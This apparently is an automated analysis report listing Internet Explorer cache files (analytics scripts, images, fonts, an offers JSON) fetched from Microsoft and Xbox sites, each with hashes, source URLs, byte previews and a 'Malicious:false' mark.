                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5f71df01-502d-46ad-87a9-26eefe403304[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):255167
                                                                                                                                                                                                              Entropy (8bit):5.139455308766283
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:N3038sinvqyWAKg/S3SjAhdZAtA2oswZwAsexoz2SLj3dm4wl4dIUUktrhzXP4qT:Nk3Zy4na2k9hxv49NH9z8n8H3RMG9+
                                                                                                                                                                                                              MD5:D397B1001F0DDED1E2AA2F50BC2C2CAB
                                                                                                                                                                                                              SHA1:040FFDC5ACB5060B50EF7E25F5AB49991EC6CAEF
                                                                                                                                                                                                              SHA-256:73CAF5B297BBBC141D4D224398CFF3643CF2A1EBD088C83C6231510CFF07E1A8
                                                                                                                                                                                                              SHA-512:7A4A65A5CE5B5D395806CDC4F3C125DB918DBBA6F12828CCB7D80B95DD354B450E759BDA94121E010EDD07FF1A736899CBF10A6A33F97FCBC929C137DD174D28
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnssl.clicktale.net/www32/ptc/5f71df01-502d-46ad-87a9-26eefe403304.js
                                                                                                                                                                                                              Preview: var CS_CONF={"projectId":2422,"status":1,"hostnames":["microsoft.com","windows.com","xbox.com","minecraft.net","azurewebsites.net"],"crossDomainTracking":1,"crossDomainSingleIframeTracking":1,"consentRequired":0,"allowSubdomains":1,"visitorCookieTimeout":34164000000,"sampleRate":100,"replayRecordingRate":0,"validationRate":10,"lastTrackingDraw":1613561419,"trackerDomain":"c.clicktale.net","recordingDomain":"r.clicktale.net","useMalkaPipeline":0,"ed":"l.clicktale.net/log/web","eMerchandisingEnabled":0,"mouseMoveHeatmapEnabled":1,"autoInsightsEnabled":0,"jsErrorsEnabled":1,"apiErrorsEnabled":0,"secureCookiesEnabled":0,"triggerSessionReplayEnabled":0,"triggerSessionReplayRegex":null,"dynamicIdRegex":"^react_[A-Za-z0-9]*$","whitelistedAttributes":[],"replayRecordingUnmaskedUrlRegex":null,"replayRecordingMaskedUrlRegex":null,"tagDeploymentMode":"DUAL_COLLECTION","experimental":null,"iframesTracking":0,"dualCollectionTagDomain":"clicktale.net","ptcDomain":"cdnssl.clicktale.net","ptcPartition
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5f71df01-502d-46ad-87a9-26eefe403304[2].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):32071
                                                                                                                                                                                                              Entropy (8bit):5.0911961629128735
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:Oh2e60yUlgLZr97wKGHsNjYYlFWK00FOKng7zxwR2T+WG79JtWJccng2gikC:sdm5fGHe8YlCxKozx6O+WGJJQJh97
                                                                                                                                                                                                              MD5:E53D5989FAA5AC680558BD711ECA8227
                                                                                                                                                                                                              SHA1:DB676C83A6397E8FF2F646B21B00183FD649ACFE
                                                                                                                                                                                                              SHA-256:BC6D5F32125F1DB95105F9B1BB14059BF065091FE18FAB25AD8EE2649C960F1F
                                                                                                                                                                                                              SHA-512:FECFEA7A41BB25FC3983938BA3879F0F391DFC915728D0621D4844B69BB4CE97E7C3B9EAA718E7B445AC99613A778593ABEB9145533EB835A907624EE67DDEAF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://cdnssl.clicktale.net/ptc/5f71df01-502d-46ad-87a9-26eefe403304.js
                                                                                                                                                                                                              Preview: // Copyright 2006-2021 ClickTale Ltd., US Patent Pending....window.ClickTaleGlobal = window.ClickTaleGlobal || {};..window.ClickTaleSettings = window.ClickTaleSettings || {};....ClickTaleGlobal.init = ClickTaleGlobal.init || {};..ClickTaleGlobal.scripts = ClickTaleGlobal.scripts || {};..ClickTaleGlobal.scripts.versions = {"wr": "latest-WR110.js", "pcc": "5f71df01-502d-46ad-87a9-26eefe403304.js?DeploymentConfigName=Release_20210413&Version=4"};..(function (d) {...var dom="h",....spe=[92,94,36,46,124,63,42,43,40,41,91,123],....rep=[98,100,102,104,106,108,110,112,114,116,118,119];...for(var v,c,i=0,len=d.length;i<len,c=d.charCodeAt(i);i++){......if(c>=97&c<=122){v=c+7;v=v>122?v-26:v;v=v%2==0?v-32:v;}....else if(c>=48&c<=57){v=69+(c-48)*2}....else if(c==45){v=65}....else if(spe.indexOf(c)>=0){v=rep[spe.indexOf(c)]}....else{v=c}....dom+=String.fromCharCode(v);...}.....ClickTaleGlobal.init.isAllowed = (function() {........var doms = ["HJJVBuahHJaPcLkPyLJaVyFhDPukVDZHgByLhJVT","HuZDLyZhTPJyVZ
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\84377d06-b16a-4248-a1c1-adb2c8e705ca[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):225
                                                                                                                                                                                                              Entropy (8bit):5.71065811106311
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:yionv//thPlbdoil+VLts7CX9/gh/rywOwAadCmbRiMVuER8Edxd7aaGLukhDhl1:6v/lhPUFR/ChmU19lVuER8EdKaCDfp
                                                                                                                                                                                                              MD5:5D8EA8A03462A4BCA81ABC17EB7F36B6
                                                                                                                                                                                                              SHA1:1D86CEB1C01E988C138DB90EAFCB9950974DEE78
                                                                                                                                                                                                              SHA-256:D3AFCCFDFC1CC1440C51E32BDC80108E9680A3A9AC9D0AE8B10BFA3A081F4500
                                                                                                                                                                                                              SHA-512:273C56353E6E2E6509E7613A5DC34601B5AE3A541B1179D4C6FA90BDBAB154E1894A753C772FFEEDEC429FA5688B893B469B7D15EBC1FC2AE71822BF1A08FDBE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/84/37/84377d06-b16a-4248-a1c1-adb2c8e705ca.png?n=image_small_40x40_blank.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........+......bKGD..............tIME.........u....iTXtComment.....Created with GIMPd.e....(IDAT8Oc....T.LP.j`.@......Q.)...R..........$........IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\88ce13e8-c756-49fa-a3d6-b50f840b0db5[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 475x534, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):111416
                                                                                                                                                                                                              Entropy (8bit):7.968392426671349
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:lgtGG+hDQg4VZvwECSlIcCjyE+QSVpAyqaez5rhRF1e7z4jbvjRtzgqwLszCHHxe:OGuvsj/+QSP5czdFljR/z6zgVwgOH+
                                                                                                                                                                                                              MD5:7D50E1FD6160241414D34EC220C29C40
                                                                                                                                                                                                              SHA1:CBB515D56EC7D7A4BB795F8AC809CD48CAF5BA51
                                                                                                                                                                                                              SHA-256:64336C723F19AAE74DCCB2117FEC20FA2537031AE25560F5F668BD373AC75E7D
                                                                                                                                                                                                              SHA-512:C423531F62B7E34D2EAD2BEA0E05F509519331A5FFBE4EFAD3285B035E61D74A947606E247FECFBEBE94FCA028FE5F8CD42681784F77FC421E9378FDBBAB3FBD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/88/ce/88ce13e8-c756-49fa-a3d6-b50f840b0db5.jpg?n=838322_Small-tout-1084_No-Logo_475x534.jpg
                                                                                                                                                                                                              Preview: .............................................................................................................................................<....Adobe.d...................................................................................................u...........!."1.AQ.2aq..#BR..b....$3Cr.....4...........%&'()*56789:DEFGHIJSTUVWXYZcdefghijstuvwxyz...............................................................................}.........!..1AQa.q...."2....#B..Rb.3r..............$%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.w.|qyb...Z..9HR.J....d..a|...VR..o.s0].W.q.J.R._.\.......m.+.S.fR4J.n1.Ue...:...1....yy}......yy{.^^......yy{.^^......yy{.^^......yy{.^^......yy{.^^......yy{.^^......yy{.^^..././-L..+..%..c......c...<..E.."J...z...I*.h....a..(.c......<...//c......<....4.}. ..+.yu..Md.*...<w..@...Q.:..T.R%..u..o.7.._*..P./f+.l1,....W..2...W..{..D.%{Q.as1^Y..]CP.......D...j..aM.....U
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8d52e1db-777a-4ba5-954e-cbcb56e5dd8e[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 8 x 3, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                              Entropy (8bit):5.815098336980296
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:fX1hJIwWwjx82lY2T3oVFEcyxGyJ3VEg1GgzGmPq:flkNNn2kHw3J3F3y
                                                                                                                                                                                                              MD5:F307C5454820842EE40BD7537DB8E1B2
                                                                                                                                                                                                              SHA1:D26471F11BECE173F2D38E303F01881A767F3E12
                                                                                                                                                                                                              SHA-256:7F967999B6E1B1D2C660502728766B1B5CA4A5EE3C0B1507519518772682F0AC
                                                                                                                                                                                                              SHA-512:77B54F32494F654B6E0A386882831A3AD18112342DB0689554307D037697CB2E8138B73A8F38D4C0AE98FF345B7263825869873F4CC3F1A5B4C20CB5817F6CF9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/8d/52/8d52e1db-777a-4ba5-954e-cbcb56e5dd8e.png?n=Clear-space_8x3.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...............NH....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:49149F34EA2A11E5A576A8819447D1CE" xmpMM:DocumentID="xmp.did:49149F35EA2A11E5A576A8819447D1CE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:73219DDFEA2011E5A576A8819447D1CE" stRef:documentID="xmp.did:73219DE0EA2011E5A576A8819447D1CE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.V.5....IDATx.b...?.>.H......?...P.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ActiveOffers[1].json
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):12044
                                                                                                                                                                                                              Entropy (8bit):5.424908988691716
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:yO4urhP8Ye8FtyYyC6pJjhHtc7eHedCpJ8uQ6Xb5JaaJowRRYCLO+VNi:Xm+vVEJjndm4J8h6lJa8owrYC3Di
                                                                                                                                                                                                              MD5:BC2F87C059D51E43CCF8D552AD69860E
                                                                                                                                                                                                              SHA1:A6E05AD717A0ABA8A4CF366C3FB7397F48AED4B8
                                                                                                                                                                                                              SHA-256:A84EA25CF51D84370F9122C13C7F866C5DD32711E1843F3778AB85E5703BC6E0
                                                                                                                                                                                                              SHA-512:294336A94075E9E1F497AC4312B5C0C11088BBB8239EFE3A7320E71C6FEBA4A8E509BCDF4A348D2D7A8C115F9E604E7EEC3790098C710EE370EB89892DEFA0E9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://offertooldataprod.blob.core.windows.net/windowsoffers/ActiveOffers.json?sp=r&st=2021-02-10T05:33:22Z&se=2025-12-31T13:33:22Z&spr=https&sv=2020-02-10&sr=b&sig=biX3IojBakOTUweFyxlbdWWm6reOqC82%2F6MZb7Gg85o%3D
                                                                                                                                                                                                              Preview: [{"OfferID":697885830,"GlobalOfferID":null,"BackgroundColor":null,"Locale":"EN-US","Status":"Active","Approved":true,"StartDate":"2019-11-18","StartTime":"06:00","EndDate":"2026-01-01","EndTime":"07:59","Text":"Shop Windows 10 PCs on sale.","CTAText":"SAVE NOW >","CTALink":"https://www.microsoft.com/en-us/store/b/shop-all-pcs?IsDeal=true","AriaLabel":"Shop Windows 10 PCs on sale at Microsoft Store","CreatedDate":"2019-11-17T22:16:27.0674569","LastUpdatedBy":"Therese Frare (TEN GUN DESIGN INC)","CreatedByEmail":"v-jand@microsoft.com","LastUpdatedByEmail":"v-tfrare@microsoft.com","ApprovedBy":"v-tfrare@microsoft.com","Pages":["/lte-tablets-laptops-and-pcs","/compare-windows-10-home-vs-pro","/comprehensive-security","/default.aspx","/view-all-devices","/compare-devices","/windows-laptops","/gaming-pcs","/desktops-and-all-in-ones","/2-in-1s","/windows-7-end-of-life-support-information","/features","/windows-10-apps","/laptops-for-college-students","/4k-laptops","/computers","/continuum","/
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Blog-high-contrast[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1204
                                                                                                                                                                                                              Entropy (8bit):6.620936303411696
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:11hSWwjx82lY2T3v4VgugAyJ3VmCQT+2eGUwnXAKuz3qVEZ+Lc:bBNn2z4wJ30CrBwQKuYnc
                                                                                                                                                                                                              MD5:C0158ABD85F9C71344A95631C5C5B80E
                                                                                                                                                                                                              SHA1:21456B3E187FA8262BBDDF87629F9E8E2252BC10
                                                                                                                                                                                                              SHA-256:FD351788DDD8A404E52617F00DCA9CA802D2FBD642D713133116E899A9E322AE
                                                                                                                                                                                                              SHA-512:5645CDB367444E5FC7657E78622041B85B7D0D2D54349E85EC429AB53683C111702ED1A2A877E87FE0AA830C1D323CAA16CEE17AF5D7A2D3802C2117EE3A0595
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/fa9a23e2/office.testdrive/images/social/Blog-high-contrast.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:E0DB8A6530A511EBB51D8748B1217C9D" xmpMM:DocumentID="xmp.did:E0DB8A6630A511EBB51D8748B1217C9D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3878F5F030A511EBB51D8748B1217C9D" stRef:documentID="xmp.did:E0DB8A6430A511EBB51D8748B1217C9D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>d......%IDATx..N.1..q....08.g.Br2...77..W...).......3.$.:.....r...^.M.J.p...8.....\..R.<GQ^.Q.TF.cl.B..4IW....#.a.e
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Blog[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                              Entropy (8bit):6.621216062932674
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:11hSWwjx82lY2T3v4V0u7AyJ3V+TpQ2eGNQebFzWvhfATXiwnI/Uu0:bBNn2z4xJ3fYRWpgywnI/Uu0
                                                                                                                                                                                                              MD5:8F8DF2A7D430812AC170089E6E1F89A5
                                                                                                                                                                                                              SHA1:963B745ECB62A21C86DD21B08C98FF0B28CBCB22
                                                                                                                                                                                                              SHA-256:43319333296E47BA21D33CF9AC03C72CFADB2F0C9CC181F896DE70129B605624
                                                                                                                                                                                                              SHA-512:84C84EBD302CCFAECC2610B245A7D7630EEB10D91928A9F43F516A788FFE8B7A163B729A4E14E0B5EF490D599D0EFD7FBBF2028384A165D403D1AB6E4DCAF1ED
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/f3229d48/office.testdrive/images/social/Blog.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmpMM:InstanceID="xmp.iid:E0DB8A6930A511EBB51D8748B1217C9D" xmpMM:DocumentID="xmp.did:E0DB8A6A30A511EBB51D8748B1217C9D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E0DB8A6730A511EBB51D8748B1217C9D" stRef:documentID="xmp.did:E0DB8A6830A511EBB51D8748B1217C9D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?><......MIDATx.b...?.5...PRR..R.D....*@<....3.]s...,PE/.......q....b...?.W@.0...X.../... >..hr. ..Aa...H.$EEE] ...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\IsUserAuthenticated[1].txt
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):30
                                                                                                                                                                                                              Entropy (8bit):3.923231428797621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:Y2REkFkJL9sn:Y2ikRn
                                                                                                                                                                                                              MD5:3B027461F6B5313F4808FD1702A45A6F
                                                                                                                                                                                                              SHA1:E8A135FB630DF8718B2C4E3BD1B3A136A59D77DC
                                                                                                                                                                                                              SHA-256:0648BA77730D4C609308FA8FD04232DD3BC4F3CFF679599DCCAEACC61BF4D96D
                                                                                                                                                                                                              SHA-512:19DCC2867251C5637315692470AAD294622CDB02054C3449CCE82387F708E2B284CE74797B606E61EBEF51835A1CB3FF97BEF34E955C8CE07FC2F1DAFA035526
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/en-us/mscomhp/onerf/IsUserAuthenticated
                                                                                                                                                                                                              Preview: {"Status":"Not Authenticated"}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\MWFMDL2[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 11480, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):11480
                                                                                                                                                                                                              Entropy (8bit):7.941998534530738
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QNhlpX236n8/cliy01vRGeJsqVZJZmKgiiwEkyaGG1QfPujdI5v9QtAOcAue2HCZ:QnjX23W8UcvRaqVZdgiiyRQf2+5v9Q0q
                                                                                                                                                                                                              MD5:5ED659CF5FC777935283BBC8AE7CC19A
                                                                                                                                                                                                              SHA1:A0490A2C4ADDD69A146A3B86C56722F89904B2F6
                                                                                                                                                                                                              SHA-256:31B8037945123706CB78D80D4D762695DF8C0755E9F7412E9961953B375708AE
                                                                                                                                                                                                              SHA-512:FCCBE358427808D44F5CDFCF1B0C5521C793716051A3777AAFDE84288FF531F3E68FBC2C2341BBFA7B495A31628EAB221A1F2BD3B0D2CC9DD7C1D3508FDE4A2F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.23.1/fonts/MWFMDL2.woff
                                                                                                                                                                                                              Preview: wOFF......,.......NH........................OS/2...X...H...`JZxhVDMX.............^.qcmap.............ph.cvt ...l... ...*....fpgm...........Y...gasp...|............glyf...... ...7.oV."head..'X...0...6.k..hhea..'........$....hmtx..'....v.....F.Eloca..(..........Y..maxp..).... ... ....name..) ..........b.post..,8....... .Q.wprep..,L........x...x.c`f..8.....u..1...4.f...$..........@ .............8.|...V...)00......x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x..AHTq.../..$mk...E#.L.<.X,..D..P..:T.$Y.x.*...!.u...!J..(.X
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\OffSMDL2.4.00[1].woff
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:Web Open Font Format, TrueType, length 28260, version 0.0
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):28260
                                                                                                                                                                                                              Entropy (8bit):7.987056042735784
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:8IjVhCYTl8JpAZvwxW/mZCE6Up2DGNnEM8bGOQ:9B8gZoxeO6R6D
                                                                                                                                                                                                              MD5:8D1B8A424DAD000770F3252B9014DDC3
                                                                                                                                                                                                              SHA1:ECC3C1B6A0209EE3F9D1DA9B9236E264D8C20757
                                                                                                                                                                                                              SHA-256:717D82DB7935874C7B7C1740B6710E9A9501595A4AA9F73754D95823058B547E
                                                                                                                                                                                                              SHA-512:3BB2623544A421A404E0578A31A2BE95E42F63A9331C411032DFA4F3A0861CB90E3FC684D6C0A965B45CAA4270A61A739AB6F277DFCB646DF86A6C3D5342E857
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socfonts/OffSMDL2.4.00.woff
                                                                                                                                                                                                              Preview: wOFF......nd...............................OS/2...X...H...`JM~.VDMX.............^.qcmap...........X.`..cvt ...X... ...*....fpgm...x.......Y...gasp...h............glyf...t..]....d.hi{head..e....2...6..Qzhhea..e........$....hmtx..e.........;.&yloca..f............$maxp..hX... ... .!.9name..hx...I....).A.post..m........ .Q.wprep..m.........x...x.c`f..8.....u..1...4.f...$..........@ .............q.........S``......x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...kl.U...3}m....K).j.Y...%.BPIS.h.mC......M.i.(..A1..h#JR
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Prefooter_Icon-21_InsiderProgram[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1275
                                                                                                                                                                                                              Entropy (8bit):4.386840594449584
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tu1jkD8d79oOafB/UTY93mewLp3liprJ7Ta3/bvsNkhWCoEk:0j88dW4S3mDVCpGTvcSWCq
                                                                                                                                                                                                              MD5:81A31DA5DD04FD4857AB1857541A6FFE
                                                                                                                                                                                                              SHA1:5EF03C52F40F8E86374D7CF037AD75739AC6EBBE
                                                                                                                                                                                                              SHA-256:38057E8200F4CD79C7C483BAC5CFDD09415F1BE64A67CE4A3DE8D2B273AD78FB
                                                                                                                                                                                                              SHA-512:B644BD5390605554678185D19D585951C292CB8773C99B24159C4B1132E1C7CE1589150FA8066D88F0436667243DF64B54EED158A8DC7584F5B03E3982E54686
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Prefooter_Icon-21_InsiderProgram.svg?version=8768bb27-2df7-f685-7e06-2732b420aa68
                                                                                                                                                                                                              Preview: <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 50 50"><defs><style>.cls-1{fill:#2f2f2f;}</style></defs><title>Prefooter_Vectors</title><path class="cls-1" d="M23.87,30.2A12.14,12.14,0,0,1,31,37.82a11.65,11.65,0,0,1,.56,3.59V42.5H29.38V41.41a9.54,9.54,0,0,0-.78-3.83,9.91,9.91,0,0,0-5.24-5.24,9.81,9.81,0,0,0-7.66,0,9.91,9.91,0,0,0-5.24,5.24,9.52,9.52,0,0,0-.78,3.83V42.5H7.5V41.41a11.63,11.63,0,0,1,.56-3.59,12.24,12.24,0,0,1,1.56-3.2,12.19,12.19,0,0,1,5.57-4.43A7.44,7.44,0,0,1,13.81,29a7.71,7.71,0,0,1-1-1.51,7.85,7.85,0,0,1-.66-1.71,7.56,7.56,0,0,1,.38-4.82,7.72,7.72,0,0,1,4.07-4.07,7.64,7.64,0,0,1,6,0,7.72,7.72,0,0,1,4.07,4.07A7.56,7.56,0,0,1,27,25.74a7.9,7.9,0,0,1-.66,1.71,7.76,7.76,0,0,1-1,1.51A7.44,7.44,0,0,1,23.87,30.2Zm-4.34-.82a5.29,5.29,0,0,0,2.12-.43,5.51,5.51,0,0,0,1.73-1.17A5.62,5.62,0,0,0,24.56,26,5.28,5.28,0,0,0,25,23.91a5.22,5.22,0,0,0-.44-2.12,5.61,5.61,0,0,0-2.91-2.91,5.22,5.22,0,0,0-2.12-.44,5.28,5.28,0,0,0-2.13.44,5.62,5.62,0,0,0-1.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC14999a828e04437b9286a3e42d5f4876-source.min[1].js
